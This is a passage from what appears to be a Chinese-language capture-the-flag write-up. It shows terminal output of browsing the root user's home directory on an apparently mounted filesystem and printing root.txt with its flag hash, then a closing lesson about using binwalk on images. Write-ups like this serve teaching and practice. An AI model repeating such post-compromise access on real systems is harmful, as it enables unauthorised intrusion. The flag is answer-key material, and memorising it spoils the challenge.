dr-xr-xr-x 136 root root 0 Dec 9 04:47 proc
drwx------ 5 root root 4.0K Sep 4 2021 root
drwxr-xr-x 29 root root 980 Dec 9 08:55 run
drwxr-xr-x 2 root root 12.0K Sep 4 2021 sbin
drwxr-xr-x 2 root root 4.0K Sep 3 2021 snap
drwxr-xr-x 2 root root 4.0K Aug 6 2020 srv
-rw------- 1 root root 1.8G Sep 3 2021 swap.img
dr-xr-xr-x 13 root root 0 Dec 9 04:47 sys
drwxrwxrwt 10 root root 4.0K Dec 9 08:45 tmp
drwxr-xr-x 11 root root 4.0K Sep 4 2021 usr
drwxr-xr-x 14 root root 4.0K Sep 3 2021 var
lrwxrwxrwx 1 root root 31 Sep 3 2021 vmlinuz -> boot/vmlinuz-4.15.0-154-generic
lrwxrwxrwx 1 root root 31 Sep 3 2021 vmlinuz.old -> boot/vmlinuz-4.15.0-154-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 48K
drwx------ 5 root root 4.0K Sep 4 2021 .
drwxr-xr-x 24 root root 4.0K Sep 3 2021 ..
lrwxrwxrwx 1 root root 9 Sep 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Sep 3 2021 .cache
drwxr-xr-x 3 root root 4.0K Sep 3 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
lrwxrwxrwx 1 root root 9 Sep 3 2021 .python_history -> /dev/null
-rw-r--r-- 1 root root 66 Sep 3 2021 .selected_editor
drwx------ 2 root root 4.0K Sep 3 2021 .ssh
-rw------- 1 root root 8.7K Sep 4 2021 .viminfo
-rw------- 1 root root 33 Sep 3 2021 root.txt
/mnt/root/root # cat root.txt
f0b98d4387ff6da77317e582da98bf31
/mnt/root/root #
至此拿到root flag
經驗教訓
- 對於圖片的分析工具集中不能忘了binwalk工具